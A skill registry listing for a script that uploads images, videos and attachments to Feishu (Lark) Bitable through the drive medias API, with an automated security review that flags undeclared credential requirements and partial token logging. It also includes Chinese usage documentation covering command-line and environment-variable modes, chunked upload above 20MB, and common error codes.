飞书多维表格文件上传
Upload files (images, videos, attachments) to Feishu (Lark) Bitable (multi-dimensional table) and return the file_token. Auto-selects direct upload for files...
MIT-0 · Free to use, modify, and redistribute. No attribution required.
⭐ 0 · 20 · 0 current installs · 0 all-time installs
byBill Zhuang@billzhuang6569
MIT-0
Security Scan
OpenClaw
Suspicious
high confidencePurpose & Capability
The script and SKILL.md both describe uploading files to Feishu Drive (medias API) and require an App ID/Secret plus a parent_node (bitable App Token). That capability matches the name/description. However the registry metadata claims no required environment variables and no primary credential while the runtime actually needs FEISHU_APP_ID, FEISHU_APP_SECRET (or equivalent CLI args) and FEISHU_PARENT_NODE; this mismatch is an incoherence that should have been declared.
Instruction Scope
SKILL.md and the included script are narrowly scoped: they parse arguments or env vars, obtain a tenant_access_token from open.feishu.cn, then call /open-apis/drive/v1/medias/(upload_all|upload_prepare|upload_part|upload_finish). The script only reads the file path provided and optional FEISHU_* env vars; it does not access unrelated system files, other credentials, or exfiltrate data to unexpected endpoints. It does print partial token and the resulting file_token to stdout (useful but a logging/privacy consideration).
Install Mechanism
This is an instruction-only skill with an included shell script; there is no install spec, no downloads, and no archive extraction. The script uses standard tools (bash, curl, python3, dd, stat, mktemp) which are normal for this task.
Credentials
The runtime legitimately requires App credentials (App ID and App Secret) and a parent_node (App Token) to call Feishu's medias API. Those credentials are appropriate for the stated purpose, but the registry metadata omitted them entirely — a material gap. Additionally the script prints the first 20 characters of the tenant_access_token to stdout which may leak sensitive token fragments in logs; users should treat outputs as sensitive.
Persistence & Privilege
The skill does not request permanent presence (always is false), does not modify other skills or global agent configuration, and does not persist additional credentials beyond using provided env vars or args. No elevated platform privileges are requested.
What to consider before installing
This skill appears to implement exactly what it claims (upload files to Feishu bitable via the /drive/v1/medias API). However the package metadata failed to declare the required credentials (FEISHU_APP_ID, FEISHU_APP_SECRET, and the parent_node/App Token). Before installing or using it: (1) review the script yourself (you have the full source) and confirm open.feishu.cn is the only remote endpoint; (2) only provide a Feishu App ID/Secret with minimal scopes (e.g., bitable:app) and use a test app/account, not global or highly privileged credentials; (3) be aware the script prints a partial tenant_access_token and the returned file_token — treat logs as sensitive and avoid sharing them; (4) ask the publisher to update the skill metadata to declare the required env vars/primary credential so the skill's manifest matches runtime needs; (5) if unsure, run the script in an isolated environment or container with limited network access and test with throwaway credentials.Like a lobster shell, security has layers — review code before you run it.
Current versionv1.1.0
Download zipbitablefeishularklatestupload
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
SKILL.md
上传素材到飞书多维表格(获取 file_token)
与官方 lark-* Skill 的定位
| 场景 | 工具 |
|---|---|
| 上传附件直接写入记录 | lark-cli base +record-upload-attachment |
| 上传文件到云空间 | lark-cli drive +upload |
| 上传素材获取独立 file_token | 本 Skill |
lark-cli 不覆盖 /drive/v1/medias/ 素材接口,本 Skill 填补该空白。
获取到的 file_token 可用于后续写入多维表格附件字段。
依赖
bash,curl,python3,dd— macOS/Linux 均内置- 飞书 App 凭证(App ID + App Secret)
脚本
scripts/feishu_upload.sh
用法
# 参数模式
bash scripts/feishu_upload.sh <文件> --parent-node <APP_TOKEN> \
--app-id <APP_ID> --app-secret <APP_SECRET>
# 环境变量模式
export FEISHU_PARENT_NODE=<APP_TOKEN>
export FEISHU_APP_ID=<APP_ID>
export FEISHU_APP_SECRET=<APP_SECRET>
bash scripts/feishu_upload.sh <文件>
--parent-type 可选(默认 bitable_file):图片附件用 bitable_image。
成功后输出 file_token: boxcnrHpsg1QDqXAAAyachabcef
自动选择上传方式
| 文件大小 | 上传方式 | API |
|---|---|---|
| ≤ 20MB | 直接上传 | POST /drive/v1/medias/upload_all |
| > 20MB | 分片上传 | upload_prepare → upload_part × N → upload_finish |
upload_allAPI 硬限制 20MB,超过必须分片(分片大小 4MB,由服务端返回)。
常见错误
| 错误码 | 原因 | 解决 |
|---|---|---|
| 1061004 | 无权限 | 确认应用有 bitable:app 权限且对目标表有编辑权限 |
| 1061044 | parent_node 不存在 | 检查多维表格 App Token 是否正确 |
| 1061043 | 文件超限 | 检查文件大小是否符合飞书限制 |
| 1061005 | Token 无效 | 检查 App ID / Secret 是否正确 |
Files
2 totalSelect a file
Select a file to preview.
Comments
Loading comments…